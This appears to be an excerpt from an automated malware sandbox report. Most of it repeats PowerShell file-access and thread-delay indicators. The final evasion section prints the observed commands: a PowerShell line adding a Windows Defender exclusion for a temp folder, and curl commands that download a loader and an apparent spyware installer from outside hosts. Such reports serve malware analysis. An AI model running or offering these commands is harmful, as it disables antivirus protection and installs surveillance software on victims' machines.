Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4800Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5010Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7424Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2141Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5296Thread sleep count: 4800 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5296Thread sleep count: 5010 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep time: -11068046444225724s >= -30000sJump to behavior
Source: C:\Windows\System32\timeout.exe TID: 7708Thread sleep count: 85 > 30Jump to behavior
Source: C:\Windows\System32\timeout.exe TID: 7856Thread sleep count: 84 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976Thread sleep count: 7424 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980Thread sleep count: 2141 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: curl.exe, 00000011.00000002.1526338394.000001E7C1BA1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: curl.exe, 0000000D.00000003.1424929417.000001C1E4543000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1425917834.000001C9F6163000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1627992980.000001D1823E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\l" https://cdnbaynet.com/loader/link.php?prg_id=sfkJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 10Jump to behavior
